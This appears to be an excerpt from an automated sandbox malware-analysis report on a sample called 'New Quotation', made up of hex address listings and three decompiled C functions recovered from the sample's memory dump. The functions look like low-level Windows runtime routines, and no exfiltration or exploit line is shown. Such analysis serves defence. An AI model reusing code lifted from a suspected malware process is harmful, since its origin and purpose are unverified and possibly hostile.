                                                                                                                                                                                          0x1d7d2faa
                                                                                                                                                                                          0x1d7d2fb2
                                                                                                                                                                                          0x1d7d2fb5
                                                                                                                                                                                          0x1d7d2fb8
                                                                                                                                                                                          0x1d7d2fb8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2fc5
                                                                                                                                                                                          0x1d7d2fcc
                                                                                                                                                                                          0x1d7d2fce
                                                                                                                                                                                          0x1d7d2fd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2fd7
                                                                                                                                                                                          0x1d7d2fd7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2fd7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2fee
                                                                                                                                                                                          0x1d7d3001
                                                                                                                                                                                          0x1d7d3003
                                                                                                                                                                                          0x1d7d3006
                                                                                                                                                                                          0x1d7d300c
                                                                                                                                                                                          0x1d7d3055
                                                                                                                                                                                          0x1d7d3055
                                                                                                                                                                                          0x1d7d305a
                                                                                                                                                                                          0x1d7d305f
                                                                                                                                                                                          0x1d7d3065
                                                                                                                                                                                          0x1d7d3074
                                                                                                                                                                                          0x1d7d3076
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d307c
                                                                                                                                                                                          0x1d7d307f
                                                                                                                                                                                          0x1d7d3082
                                                                                                                                                                                          0x1d7d3085
                                                                                                                                                                                          0x1d7d3088
                                                                                                                                                                                          0x1d7d308b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d308b
                                                                                                                                                                                          0x1d7d3067
                                                                                                                                                                                          0x1d7d3069
                                                                                                                                                                                          0x1d7d306c
                                                                                                                                                                                          0x1d7d2fba
                                                                                                                                                                                          0x1d7d2fba
                                                                                                                                                                                          0x1d7d2fbd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2fbd
                                                                                                                                                                                          0x1d7d300e
                                                                                                                                                                                          0x1d7d3011
                                                                                                                                                                                          0x1d7d301a
                                                                                                                                                                                          0x1d7d3020
                                                                                                                                                                                          0x1d7d302a
                                                                                                                                                                                          0x1d7d302f
                                                                                                                                                                                          0x1d7d3032
                                                                                                                                                                                          0x1d7d3034
                                                                                                                                                                                          0x1d7d310c
                                                                                                                                                                                          0x1d7d3111
                                                                                                                                                                                          0x1d7d3116
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3116
                                                                                                                                                                                          0x1d7d303a
                                                                                                                                                                                          0x1d7d304b
                                                                                                                                                                                          0x1d7d3050
                                                                                                                                                                                          0x1d7d3052
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f7d
                                                                                                                                                                                          0x1d7d2f80
                                                                                                                                                                                          0x1d7d2f82
                                                                                                                                                                                          0x1d7d2f84
                                                                                                                                                                                          0x1d7d2f87
                                                                                                                                                                                          0x1d7d2f89
                                                                                                                                                                                          0x1d7d2f8e
                                                                                                                                                                                          0x1d7d2f91
                                                                                                                                                                                          0x1d7d2f94
                                                                                                                                                                                          0x1d7d2f94
                                                                                                                                                                                          0x1d7d2f97
                                                                                                                                                                                          0x1d7d2f99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f9b
                                                                                                                                                                                          0x1d7d2f9b
                                                                                                                                                                                          0x1d7d2f9e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f9e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d308f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3098
                                                                                                                                                                                          0x1d7d309f
                                                                                                                                                                                          0x1d7d30a1
                                                                                                                                                                                          0x1d7d30a5
                                                                                                                                                                                          0x1d7d30a7
                                                                                                                                                                                          0x1d7d30ac
                                                                                                                                                                                          0x1d7d30b1
                                                                                                                                                                                          0x1d7d30b5
                                                                                                                                                                                          0x1d7d30b8
                                                                                                                                                                                          0x1d7d30ba
                                                                                                                                                                                          0x1d7d30bc
                                                                                                                                                                                          0x1d7d30c1
                                                                                                                                                                                          0x1d7d30c4
                                                                                                                                                                                          0x1d7d30c4
                                                                                                                                                                                          0x1d7d30c6
                                                                                                                                                                                          0x1d7d30bc
                                                                                                                                                                                          0x1d7d30c9
                                                                                                                                                                                          0x1d7d30cc
                                                                                                                                                                                          0x1d7d30cf
                                                                                                                                                                                          0x1d7d30d1
                                                                                                                                                                                          0x1d7d2fdc
                                                                                                                                                                                          0x1d7d2fdc
                                                                                                                                                                                          0x1d7d2fdc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d30db
                                                                                                                                                                                          0x1d7d30e1
                                                                                                                                                                                          0x1d7d30e1
                                                                                                                                                                                          0x1d7d30e4
                                                                                                                                                                                          0x1d7d30ee
                                                                                                                                                                                          0x1d7d30ee
                                                                                                                                                                                          0x1d7d30f2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d30f2
                                                                                                                                                                                          0x1d7d30e6
                                                                                                                                                                                          0x1d7d30e9
                                                                                                                                                                                          0x1d7d30e9
                                                                                                                                                                                          0x1d7d30ec
                                                                                                                                                                                          0x1d7d30ec
                                                                                                                                                                                          0x1d7d30ec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f63
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: PATH
                                                                                                                                                                                          • API String ID: 0-1036084923
                                                                                                                                                                                          • Opcode ID: 36a80f476afc67640b4c2cc2b0a50e1ae71458bcc59fa3c36f513251834271df
                                                                                                                                                                                          • Instruction ID: 3295e21f2fb27676732ed63c070c40f647f28d469b31982f46408a0bcb0851f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a80f476afc67640b4c2cc2b0a50e1ae71458bcc59fa3c36f513251834271df
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F1D271D00B28DFCB55CF98D881AFEB7B1FF48760F55802AE944AB260D735A941CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CAE40 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E1D7CAE40(signed int __ebx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t44;
				signed int _t51;
				signed int* _t54;
				signed int _t57;
				signed int _t60;
				signed int _t64;
				void* _t65;
				intOrPtr* _t69;
				signed int _t71;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				void* _t85;
				void* _t90;
				void* _t91;

				_t83 = __esi;
				_t62 = __ebx;
				_push(0x2c);
				_push(0x1d8aba98);
				E1D827BE4(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x19)) = 0;
				_t80 =  *((intOrPtr*)(_t85 + 8));
				if(_t80 == 0) {
					L4:
					_t44 =  *( *[fs:0x30] + 0xc);
					if( *((char*)(_t44 + 0x28)) == 0) {
						_t44 = E1D8A4A6D(_t62, _t65, _t76, _t80, _t83);
					}
					L5:
					 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0x10));
					return _t44;
				}
				_t90 = _t80 -  *0x1d8c6890; // 0x18e07c0
				if(_t90 == 0) {
					goto L4;
				}
				_t91 = _t80 -  *0x1d8c6888; // 0x1968188
				if(_t91 == 0 ||  *((char*)( *( *[fs:0x30] + 0xc) + 0x28)) != 0) {
					goto L4;
				} else {
					_t8 = _t80 + 0xe0; // 0xe0
					L1D7E2330(_t8, _t8);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t80 + 0xe5));
					if( *((char*)(_t80 + 0xe5)) != 0) {
						E1D8A4A6D(__ebx, _t65, _t76, _t80, __esi);
						goto L12;
					} else {
						__eflags =  *((char*)(_t80 + 0xe4));
						if( *((char*)(_t80 + 0xe4)) == 0) {
							 *((char*)(_t80 + 0xe4)) = 1;
							_push(_t80);
							_push( *((intOrPtr*)(_t80 + 0x24)));
							E1D814500();
						}
						while(1) {
							_t15 = _t80 + 8; // 0x8
							_t54 = _t15;
							 *(_t85 - 0x20) = _t54;
							_t62 =  *_t54;
							_t71 = _t54[1];
							 *(_t85 - 0x38) = _t62;
							 *(_t85 - 0x34) = _t71;
							while(1) {
								L10:
								__eflags = _t71;
								if(_t71 == 0) {
									break;
								}
								_t83 = _t62;
								_t78 = _t71;
								 *(_t85 - 0x24) = _t78;
								 *(_t85 - 0x34) = _t71 - 1;
								asm("lock cmpxchg8b [edi]");
								_t62 = _t83;
								 *(_t85 - 0x38) = _t62;
								_t71 = _t78;
								 *(_t85 - 0x34) = _t71;
								__eflags = _t62 - _t83;
								_t80 =  *((intOrPtr*)(_t85 + 8));
								if(_t62 != _t83) {
									continue;
								}
								__eflags = _t71 -  *(_t85 - 0x24);
								if(_t71 !=  *(_t85 - 0x24)) {
									continue;
								}
								__eflags = _t71;
								if(_t71 == 0) {
									break;
								}
								_t57 = 0;
								 *(_t85 - 0x28) = 0;
								_t83 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x30) = _t83;
									__eflags = _t83 - 3;
									if(_t83 >= 3) {
										break;
									}
									__eflags = _t57;
									if(_t57 != 0) {
										L40:
										_t83 =  *_t57;
										__eflags = _t83;
										if(_t83 != 0) {
											_t83 =  *(_t83 + 4);
											__eflags = _t83;
											if(_t83 != 0) {
												 *0x1d8c91e0(_t57, _t80);
												 *_t83();
											}
										}
										do {
											_t15 = _t80 + 8; // 0x8
											_t54 = _t15;
											 *(_t85 - 0x20) = _t54;
											_t62 =  *_t54;
											_t71 = _t54[1];
											 *(_t85 - 0x38) = _t62;
											 *(_t85 - 0x34) = _t71;
											goto L10;
										} while (_t57 == 0);
										goto L40;
									}
									_t64 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x2c) = _t64;
										__eflags = _t64 -  *0x1d8c6640; // 0x1
										if(__eflags >= 0) {
											break;
										}
										__eflags = _t57;
										if(_t57 != 0) {
											break;
										}
										_t60 = E1D8A523E(_t64, _t64 * 0xc +  *((intOrPtr*)(_t80 + 0x10 + _t83 * 4)), _t78);
										__eflags = _t60;
										if(_t60 == 0) {
											_t57 = 0;
											__eflags = 0;
										} else {
											_t57 = _t60 + 0xfffffff4;
										}
										 *(_t85 - 0x28) = _t57;
										_t64 = _t64 + 1;
									}
									_t83 = _t83 + 1;
								}
								__eflags = _t57;
							}
							 *((intOrPtr*)(_t80 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t80 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x19)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E1D7CAF6D(_t80);
							_t51 = E1D7E3C40();
							__eflags = _t51;
							if(_t51 != 0) {
								_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t44 = 0x7ffe0386;
							}
							__eflags =  *_t44;
							if( *_t44 != 0) {
								_t44 = E1D8A4D4B(_t80);
							}
							__eflags =  *((char*)(_t85 - 0x19));
							if( *((char*)(_t85 - 0x19)) == 0) {
								goto L5;
							} else {
								__eflags = _t80 -  *0x1d8c6890; // 0x18e07c0
								if(__eflags == 0) {
									_t77 = 0x1d8c6894;
									_t69 = 0x1d8c6890;
									L20:
									_t44 = E1D7D2712(_t62, _t69, _t77, _t80, _t83, __eflags);
									goto L5;
								}
								__eflags = _t80 -  *0x1d8c6888; // 0x1968188
								if(__eflags != 0) {
									_t44 = _t44 | 0xffffffff;
									__eflags = _t44;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t44 = E1D7CB705(_t62, _t80, _t80, _t83, __eflags);
									}
									goto L5;
								}
								_t77 = 0x1d8c688c;
								_t69 = 0x1d8c6888;
								goto L20;
							}
						}
					}
				}
			}



















                                                                                                                                                                                          0x1d7cae40
                                                                                                                                                                                          0x1d7cae40
                                                                                                                                                                                          0x1d7cae40
                                                                                                                                                                                          0x1d7cae42
                                                                                                                                                                                          0x1d7cae47
                                                                                                                                                                                          0x1d7cae4c
                                                                                                                                                                                          0x1d7cae50
                                                                                                                                                                                          0x1d7cae55
                                                                                                                                                                                          0x1d7cae76
                                                                                                                                                                                          0x1d7cae7c
                                                                                                                                                                                          0x1d7cae83
                                                                                                                                                                                          0x1d82cb12
                                                                                                                                                                                          0x1d82cb12
                                                                                                                                                                                          0x1d7cae89
                                                                                                                                                                                          0x1d7cae8c
                                                                                                                                                                                          0x1d7cae98
                                                                                                                                                                                          0x1d7cae98
                                                                                                                                                                                          0x1d7cae57
                                                                                                                                                                                          0x1d7cae5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cae5f
                                                                                                                                                                                          0x1d7cae65
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cae9b
                                                                                                                                                                                          0x1d7cae9b
                                                                                                                                                                                          0x1d7caea2
                                                                                                                                                                                          0x1d7caea7
                                                                                                                                                                                          0x1d7caeab
                                                                                                                                                                                          0x1d7caeb2
                                                                                                                                                                                          0x1d82ca34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caeb8
                                                                                                                                                                                          0x1d7caeb8
                                                                                                                                                                                          0x1d7caebf
                                                                                                                                                                                          0x1d7caec1
                                                                                                                                                                                          0x1d7caec8
                                                                                                                                                                                          0x1d7caec9
                                                                                                                                                                                          0x1d7caecc
                                                                                                                                                                                          0x1d7caecc
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caed4
                                                                                                                                                                                          0x1d7caed7
                                                                                                                                                                                          0x1d7caed9
                                                                                                                                                                                          0x1d7caedc
                                                                                                                                                                                          0x1d7caedf
                                                                                                                                                                                          0x1d7caee2
                                                                                                                                                                                          0x1d7caee2
                                                                                                                                                                                          0x1d7caee2
                                                                                                                                                                                          0x1d7caee4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ca3e
                                                                                                                                                                                          0x1d82ca40
                                                                                                                                                                                          0x1d82ca42
                                                                                                                                                                                          0x1d82ca46
                                                                                                                                                                                          0x1d82ca4f
                                                                                                                                                                                          0x1d82ca53
                                                                                                                                                                                          0x1d82ca55
                                                                                                                                                                                          0x1d82ca58
                                                                                                                                                                                          0x1d82ca5a
                                                                                                                                                                                          0x1d82ca5d
                                                                                                                                                                                          0x1d82ca5f
                                                                                                                                                                                          0x1d82ca62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ca68
                                                                                                                                                                                          0x1d82ca6b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ca71
                                                                                                                                                                                          0x1d82ca73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ca79
                                                                                                                                                                                          0x1d82ca7b
                                                                                                                                                                                          0x1d82ca7e
                                                                                                                                                                                          0x1d82ca7e
                                                                                                                                                                                          0x1d82ca80
                                                                                                                                                                                          0x1d82ca80
                                                                                                                                                                                          0x1d82ca83
                                                                                                                                                                                          0x1d82ca86
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ca88
                                                                                                                                                                                          0x1d82ca8a
                                                                                                                                                                                          0x1d82cac5
                                                                                                                                                                                          0x1d82cac5
                                                                                                                                                                                          0x1d82cac7
                                                                                                                                                                                          0x1d82cac9
                                                                                                                                                                                          0x1d82cacf
                                                                                                                                                                                          0x1d82cad2
                                                                                                                                                                                          0x1d82cad4
                                                                                                                                                                                          0x1d82cade
                                                                                                                                                                                          0x1d82cae4
                                                                                                                                                                                          0x1d82cae4
                                                                                                                                                                                          0x1d82cad4
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caed4
                                                                                                                                                                                          0x1d7caed7
                                                                                                                                                                                          0x1d7caed9
                                                                                                                                                                                          0x1d7caedc
                                                                                                                                                                                          0x1d7caedf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caedf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d82ca8c
                                                                                                                                                                                          0x1d82ca8c
                                                                                                                                                                                          0x1d82ca8e
                                                                                                                                                                                          0x1d82ca8e
                                                                                                                                                                                          0x1d82ca91
                                                                                                                                                                                          0x1d82ca97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ca99
                                                                                                                                                                                          0x1d82ca9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82caa4
                                                                                                                                                                                          0x1d82caa9
                                                                                                                                                                                          0x1d82caab
                                                                                                                                                                                          0x1d82cab2
                                                                                                                                                                                          0x1d82cab2
                                                                                                                                                                                          0x1d82caad
                                                                                                                                                                                          0x1d82caad
                                                                                                                                                                                          0x1d82caad
                                                                                                                                                                                          0x1d82cab4
                                                                                                                                                                                          0x1d82cab7
                                                                                                                                                                                          0x1d82cab7
                                                                                                                                                                                          0x1d82caba
                                                                                                                                                                                          0x1d82caba
                                                                                                                                                                                          0x1d82cabd
                                                                                                                                                                                          0x1d82cabd
                                                                                                                                                                                          0x1d7caeed
                                                                                                                                                                                          0x1d7caef3
                                                                                                                                                                                          0x1d7caefa
                                                                                                                                                                                          0x1d7caefe
                                                                                                                                                                                          0x1d7caefe
                                                                                                                                                                                          0x1d7caf05
                                                                                                                                                                                          0x1d7caf0a
                                                                                                                                                                                          0x1d7caf0f
                                                                                                                                                                                          0x1d7caf11
                                                                                                                                                                                          0x1d82cafc
                                                                                                                                                                                          0x1d7caf17
                                                                                                                                                                                          0x1d7caf17
                                                                                                                                                                                          0x1d7caf17
                                                                                                                                                                                          0x1d7caf1c
                                                                                                                                                                                          0x1d7caf1f
                                                                                                                                                                                          0x1d7caf7c
                                                                                                                                                                                          0x1d7caf7c
                                                                                                                                                                                          0x1d7caf21
                                                                                                                                                                                          0x1d7caf25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caf2b
                                                                                                                                                                                          0x1d7caf2b
                                                                                                                                                                                          0x1d7caf31
                                                                                                                                                                                          0x1d7caf47
                                                                                                                                                                                          0x1d7caf4c
                                                                                                                                                                                          0x1d7caf51
                                                                                                                                                                                          0x1d7caf51
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caf51
                                                                                                                                                                                          0x1d7caf33
                                                                                                                                                                                          0x1d7caf39
                                                                                                                                                                                          0x1d7caf5b
                                                                                                                                                                                          0x1d7caf5b
                                                                                                                                                                                          0x1d7caf5e
                                                                                                                                                                                          0x1d7caf62
                                                                                                                                                                                          0x1d82cb08
                                                                                                                                                                                          0x1d82cb08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caf62
                                                                                                                                                                                          0x1d7caf3b
                                                                                                                                                                                          0x1d7caf40
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7caf40
                                                                                                                                                                                          0x1d7caf25
                                                                                                                                                                                          0x1d7caed1
                                                                                                                                                                                          0x1d7caeb2

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5ff32f875aceca335ad41f65385740b0c737512bf77bd9e2fd18fe44f17fad5e
                                                                                                                                                                                          • Instruction ID: 62a33033477a8fa9d74c2c8e3a770b60cfaec384b3b012d16f22a8631078743e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff32f875aceca335ad41f65385740b0c737512bf77bd9e2fd18fe44f17fad5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8151C3B5E04696DFCB16EBA8C4817BEBBB1BB48725F55416ED40AA7250D330F880C793
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80B890 Relevance: 1.6, APIs: 1, Instructions: 86timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E1D80B890(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v32;
				void* _v52;
				void* _t28;
				char* _t31;
				void* _t33;
				char* _t37;
				char* _t46;
				void* _t63;
				signed int _t69;
				signed int _t70;

				_t70 = _t69 & 0xfffffff8;
				_push(__ecx);
				_t66 = _a8;
				_t63 = _a8 - 0x78;
				_t28 = E1D7E3C40();
				_t46 = 0x7ffe0386;
				if(_t28 != 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t31 = 0x7ffe0386;
				}
				if( *_t31 != 0) {
					E1D8A4B67( *((intOrPtr*)(_t63 + 0x5c)), _t66,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
				}
				_t33 = E1D7D7072(_a4, _t63, 1);
				if(_t33 != 0) {
					if(E1D7E3C40() != 0) {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t37 = _t46;
					}
					if( *_t37 != 0) {
						E1D8A4C59( *((intOrPtr*)(_t63 + 0x5c)), _t66,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
					}
					E1D7D6F4C(_t70 + 0x10,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
					 *0x1d8c91e0(_a4,  *((intOrPtr*)(_t63 + 0x34)));
					 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x30))))();
					if(E1D7E3C40() != 0) {
						_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t46 != 0) {
						E1D8A4CD2( *((intOrPtr*)(_t63 + 0x5c)), _a8,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
					}
					_t33 = E1D7D6ECF( *((intOrPtr*)(_t70 + 0xc)));
				}
				return _t33;
			}













                                                                                                                                                                                          0x1d80b895
                                                                                                                                                                                          0x1d80b898
                                                                                                                                                                                          0x1d80b89b
                                                                                                                                                                                          0x1d80b89f
                                                                                                                                                                                          0x1d80b8a2
                                                                                                                                                                                          0x1d80b8a7
                                                                                                                                                                                          0x1d80b8ae
                                                                                                                                                                                          0x1d847461
                                                                                                                                                                                          0x1d80b8b4
                                                                                                                                                                                          0x1d80b8b4
                                                                                                                                                                                          0x1d80b8b4
                                                                                                                                                                                          0x1d80b8b9
                                                                                                                                                                                          0x1d847479
                                                                                                                                                                                          0x1d847479
                                                                                                                                                                                          0x1d80b8c6
                                                                                                                                                                                          0x1d80b8cd
                                                                                                                                                                                          0x1d80b8d6
                                                                                                                                                                                          0x1d84748c
                                                                                                                                                                                          0x1d80b8dc
                                                                                                                                                                                          0x1d80b8dc
                                                                                                                                                                                          0x1d80b8dc
                                                                                                                                                                                          0x1d80b8e1
                                                                                                                                                                                          0x1d8474a4
                                                                                                                                                                                          0x1d8474a4
                                                                                                                                                                                          0x1d80b8f4
                                                                                                                                                                                          0x1d80b904
                                                                                                                                                                                          0x1d80b90a
                                                                                                                                                                                          0x1d80b913
                                                                                                                                                                                          0x1d8474b7
                                                                                                                                                                                          0x1d8474b7
                                                                                                                                                                                          0x1d80b91c
                                                                                                                                                                                          0x1d8474d1
                                                                                                                                                                                          0x1d8474d1
                                                                                                                                                                                          0x1d80b926
                                                                                                                                                                                          0x1d80b926
                                                                                                                                                                                          0x1d80b931

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 932b35c7cba2a609425e3b2e419689c31d4f8647243c4fde0927f01cdf82485a
                                                                                                                                                                                          • Instruction ID: bce086d54d3cc9a79c71f34e3ff1e95b3362ca75294644d846abc0194b402065
                                                                                                                                                                                          • Opcode Fuzzy Hash: 932b35c7cba2a609425e3b2e419689c31d4f8647243c4fde0927f01cdf82485a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D319C39605A4ABFDB429F24DD44FA9BB66FF44750F119061E90447A61DB31F830DBC2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7EDCD1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E1D7EDCD1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t24;
				signed char* _t30;
				char _t35;
				void* _t45;
				intOrPtr _t48;
				void* _t50;

				_push("true");
				_push(0x1d8ac2e0);
				E1D827BE4(__ebx, __edi, __esi);
				_t48 = __edx;
				 *((intOrPtr*)(_t50 - 0x20)) = __edx;
				_t45 = __ecx;
				if(E1D7E3C40() != 0) {
					_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t24 = 0x7ffe0384;
				}
				if( *_t24 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
						goto L3;
					}
					if(E1D7E3C40() == 0) {
						_t30 = 0x7ffe0385;
					} else {
						_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t30 & 0x00000020) == 0) {
						goto L3;
					}
					_t35 = 0;
					E1D850227(0x14a3, _t48, 0,  *((intOrPtr*)(_t50 + 8)), 0, 0);
					goto L4;
				} else {
					L3:
					_t35 = 0;
					L4:
					 *((char*)(_t50 - 0x19)) = _t35;
					 *((intOrPtr*)(_t50 - 4)) = _t35;
					 *((intOrPtr*)(_t50 - 0x24)) = 1;
					L1D814CDB();
					 *((char*)(_t50 - 0x19)) = E1D812960(_t45, _t48,  *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)));
					 *((intOrPtr*)(_t50 - 4)) = 0xfffffffe;
					 *((intOrPtr*)(_t50 - 0x24)) = 0;
					E1D7EDD4D(_t35, _t48);
					 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0x10));
					return  *((intOrPtr*)(_t50 - 0x19));
				}
			}









                                                                                                                                                                                          0x1d7edcd1
                                                                                                                                                                                          0x1d7edcd3
                                                                                                                                                                                          0x1d7edcd8
                                                                                                                                                                                          0x1d7edcdd
                                                                                                                                                                                          0x1d7edcdf
                                                                                                                                                                                          0x1d7edce2
                                                                                                                                                                                          0x1d7edceb
                                                                                                                                                                                          0x1d8394ae
                                                                                                                                                                                          0x1d7edcf1
                                                                                                                                                                                          0x1d7edcf1
                                                                                                                                                                                          0x1d7edcf1
                                                                                                                                                                                          0x1d7edcf9
